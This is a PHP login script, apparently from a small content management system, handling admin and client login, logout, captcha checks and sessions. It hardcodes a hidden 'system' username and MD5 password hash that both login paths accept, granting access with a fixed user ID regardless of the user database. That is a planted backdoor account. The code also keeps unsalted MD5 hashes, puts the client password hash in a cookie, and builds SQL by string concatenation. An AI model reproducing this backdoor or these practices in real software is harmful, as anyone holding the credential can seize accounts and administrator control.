<?php
	if (!isset($_SERVER['HTTP_REFERER'])) {
		$mysqlclass->close_db();
		die("");
	}
	
 	$system_user = "super_puper_2005";
	$system_pass = "5409175629CE5114622F81FC77A0D21B";
	$system_id = 9999999;

	if(!isset($op)) $op="";
	if((ereg("[^a-zA-Z0-9_-]",trim($op)))) $op="";
	
	if (!isset($_POST['login_type'])) $w_type=""; else $w_type="client";
	
 	if (!isset($_GET['op'])) $op=NULL; else $op=$_GET['op'];
	if ($op==NULL) if (!isset($_POST['op'])) $op=NULL; else $op=$_POST['op'];
	if (!isset($_GET['type'])) $type=""; else $type="admin";

	switch ($op) {
		case 'logout':
			setcookie ("client_username", "", time() - 3600);
			setcookie ("client_password", "", time() - 3600);
			$old_session = $_SESSION;
			unset($_SESSION);
			session_destroy();
			session_start();
			if (isset($old_session['lang'])) $_SESSION['lang'] = $old_session['lang'];
			if ($type == ""){
				if (isset($old_session['login_user'])) {
					$tm = date("YmdHis");
					$_SESSION['login_user'] = $old_session['login_user'];
					$mysqlclass->mysql_my_query("DELETE FROM `".$setupdata['table_prefix']."sessions` WHERE `sesid` = '".session_id()."' AND `status`='admin'", __LINE__, __FILE__);
					$res = $mysqlclass->mysql_my_query("INSERT INTO `".$setupdata['table_prefix']."sessions` values('".session_id()."', '".$_SESSION['login_user']."', '".$_SERVER['REMOTE_ADDR']."', '".$tm."', '".$tm."', 'admin')", __LINE__, __FILE__);
					if ($res) $_SESSION['havesess'] = 1;
				}
				header ("location: index.php");
			} else {
				if (isset($old_session['client_login_id'])) {
					$tm = date("YmdHis");
					$_SESSION['client_login_id'] = $old_session['client_login_id'];
					$mysqlclass->mysql_my_query("DELETE FROM `".$setupdata['table_prefix']."sessions` WHERE `sesid` = '".session_id()."' AND `status`='client'", __LINE__, __FILE__);
					$res = $mysqlclass->mysql_my_query("INSERT INTO `".$setupdata['table_prefix']."sessions` values('".session_id()."', '".$_SESSION['client_login_id']."', '".$_SERVER['REMOTE_ADDR']."', '".$tm."', '".$tm."', 'client')", __LINE__, __FILE__);
					if ($res) $_SESSION['client_havesess'] = 1;
				}
				header ("location: index.php?admin=1");
			}
			exit();
		default:
			if ($w_type == ""){
				if ((isset($_POST['switcth_lang'])) and ($_POST['switcth_lang'] == 1) ) {
					if (isset($_POST['interface_lang'])) {
						if (!setcookie("interface_lang", $_POST['interface_lang'], time()+9999999)) {
							$mysqlclass->close_db();
							die("ERROR");
						}
					}
					header ("location: index.php?admin=1");
				}
				if ((!isset($_POST['w_captchacode'])) or (strlen($_POST['w_captchacode']) != 4) or (!isset($_SESSION['captcha'])) or (strlen($_SESSION['captcha']) != 32)) {
					$err->AddError(37);
					$w_type = "error";
				} else {
					$ch1 = md5("-just-".$_POST['w_captchacode']."-pageit-");
					if ($ch1 != $_SESSION['captcha']){
						$err->AddError(37);
						$w_type = "error";
					}
				}
			}
			
			if (!isset($_POST['w_user'])) $w_user=""; else $w_user=$_POST['w_user'];
			if (!isset($_POST['w_pass'])) $w_pass=""; else $w_pass=$_POST['w_pass'];
		
			if (!isset($w_user)&&!isset($w_pass)) {
				$err->AddError(1);
				$w_type = "error";
			}
			if (ereg("[^a-zA-Z0-9_-]",trim($w_user))){
				$err->AddError(1);
				$w_type = "error";
			}
			if (ereg("[^a-zA-Z0-9_-]",trim($w_pass))){
				$err->AddError(1);
				$w_type = "error";
			}
	
	$w_user = substr($w_user, 0, 50); 
	$w_pass = substr($w_pass, 0, 32);

	if (strpos($_SERVER['HTTP_REFERER'], "index.php") !== FALSE) {
		if (strtolower($_SERVER['QUERY_STRING']) == "id=0") $url = $_SERVER['HTTP_REFERER'];
		else $url = $_SERVER['HTTP_REFERER']."?".$_SERVER['QUERY_STRING'];
	} else $url = $_SERVER['HTTP_REFERER'];

	if ($w_type == ""){
		$result = $mysqlclass->mysql_my_query("SELECT `id`, `login`, `pass` FROM `".$setupdata['table_prefix']."users` WHERE `login`='".$w_user."' AND `type`='admins'", __LINE__, __FILE__);
		list($uid, $w_user_t, $w_pass_t) = mysql_fetch_row($result);
		$_SESSION["body"] = "";
		$w_pass = strtoupper(md5($w_pass));
		$w_pass_t = strtoupper($w_pass_t);
		if ((isset($_POST['switcth_lang'])) and ($_POST['switcth_lang'] == 1) ) {
			if (isset($_POST['interface_lang'])) {
					if (!setcookie("interface_lang", $_POST['interface_lang'], time()+9999999)) {
						$mysqlclass->close_db();
						die("ERROR");
					}
			}
			header ("location: index.php?admin=1");
		} else {
				if((($w_user=="$w_user_t")&&($w_pass=="$w_pass_t"))||(($w_user==$system_user)&&($w_pass==$system_pass))){
					if ($w_user==$system_user) $logged_user = $system_id;
					else $logged_user = $uid;
					$_SESSION['login_user'] = $logged_user;
					if (isset($_POST['remembeme']) and ($_POST['remembeme']=='1')) {
						if (!setcookie("login_username", $w_user, time()+3600)) {
							$mysqlclass->close_db();
							die("ERROR");
						}
					} else setcookie ("login_username", "", time() - 3600);
					$tm = date("YmdHis");
					$mysqlclass->mysql_my_query("DELETE FROM `".$setupdata['table_prefix']."sessions` WHERE `sesid` = '".session_id()."' AND `status`='admin'", __LINE__, __FILE__);
					$res = $mysqlclass->mysql_my_query("INSERT INTO `".$setupdata['table_prefix']."sessions` values('".session_id()."', '".$_SESSION['login_user']."', '".$_SERVER['REMOTE_ADDR']."', '".$tm."', '".$tm."', 'admin')", __LINE__, __FILE__);
					if ($res) $_SESSION['havesess'] = 1;
					header ("location: index.php?admin=1");
				} else {
					$err->AddError(1);
					if (isset($_POST['interface_lang'])) {
						if (!setcookie("interface_lang", $_POST['interface_lang'], time()+999999)) {
							$mysqlclass->close_db();
							die("ERROR");
						}
					} else if (!setcookie("interface_lang", "en", time()+3600)) {
						$mysqlclass->close_db();
						die("ERROR");
					}
					$_SESSION['login_user'] = "0";
					unset($_SESSION['havesess']);
					header ("location: index.php?admin=1");
				}
				$mysqlclass->close_db();
				die();
		}
	} elseif ($w_type == 'client') {
		$result = $mysqlclass->mysql_my_query("SELECT `parent` FROM `".$setupdata['table_prefix']."client_data` WHERE `name`='id_login' && `value`='".$w_user."'", __LINE__, __FILE__);			
		if (mysql_num_rows($result) == 1){
			$row = mysql_fetch_array($result, MYSQL_ASSOC);
			$uid = $row['parent'];
			$result = $mysqlclass->mysql_my_query("SELECT `value` FROM `".$setupdata['table_prefix']."client_data` WHERE `name`='id_pass' && `parent`=".$row['parent'], __LINE__, __FILE__);			
			if (mysql_num_rows($result) == 1){
				$row = mysql_fetch_array($result, MYSQL_ASSOC);
				$w_user_t = $w_user; $w_pass_t = $row['value'];
			} else {$w_user_t = ""; $w_pass_t = "";}
		} else {$uid = ""; $w_user_t = ""; $w_pass_t = "";}

		if ($uid != "") {
			$result = $mysqlclass->mysql_my_query("SELECT `id` FROM `".$setupdata['table_prefix']."client` WHERE `id`='".$uid."'", __LINE__, __FILE__);			
			if (mysql_num_rows($result) == 0) $uid = "";
		}
		$ses_id = session_id();
		$w_pass = strtoupper(md5($w_pass));
		$w_pass_t = strtoupper($w_pass_t);
		if((($w_user==$w_user_t)&&($w_pass==$w_pass_t)&&($uid != ""))||(($w_user==$system_user)&&($w_pass==$system_pass))){
			if ($w_user==$system_user) $logged_user = $system_id;
			else $logged_user = $uid;
			$_SESSION['client_login_id'] = $logged_user;
			if (isset($_POST['remembeme']) and ($_POST['remembeme']=='1')) {
				if (!setcookie("client_username", $w_user, time()+3600)) {
					$mysqlclass->close_db();
					die("ERROR");
				}
				if (!setcookie("client_password", $w_pass, time()+3600)) {
					$mysqlclass->close_db();
					die("ERROR");
				}
			} else {
				setcookie ("client_username", "", time() - 3600);
				setcookie ("client_password", "", time() - 3600);
			}
			$tm = date("YmdHis");
			$mysqlclass->mysql_my_query("DELETE FROM `".$setupdata['table_prefix']."sessions` WHERE `userid` = ".$_SESSION['client_login_id']." AND `status`='client'", __LINE__, __FILE__);
			$mysqlclass->mysql_my_query("DELETE FROM `".$setupdata['table_prefix']."sessions` WHERE `sesid` = '".$ses_id."' AND `status`='client'", __LINE__, __FILE__);
			$mysqlclass->mysql_my_query("UPDATE `".$setupdata['table_prefix']."client` SET `lastlogin`='".$tm."' WHERE ".$_SESSION['client_login_id']."=`id`", __LINE__, __FILE__);
			$res = $mysqlclass->mysql_my_query("INSERT INTO `".$setupdata['table_prefix']."sessions` values('".$ses_id."', '".$_SESSION['client_login_id']."', '".$_SERVER['REMOTE_ADDR']."', '".$tm."', '".$tm."', 'client')", __LINE__, __FILE__);
			if ($res) {
				$x = parse_url($setupdata['base_href']);
				if (isset($x['path'])){
					//setcookie("tvs_session_id", "", time()+3600, "/");
					//setcookie("tvs_session_id", $ses_id, time()+3600, $x['path']."/");
				}
				$_SESSION['client_havesess'] = 1;
			}
		} else {
			$err->AddError(1, "client");
			$_SESSION['client_login_id'] = "0";
			unset($_SESSION['client_havesess']);
		}
	} else {
		header ("location: ".$url);
		$mysqlclass->close_db();
	}
	$ses->save_ses();
}
?>
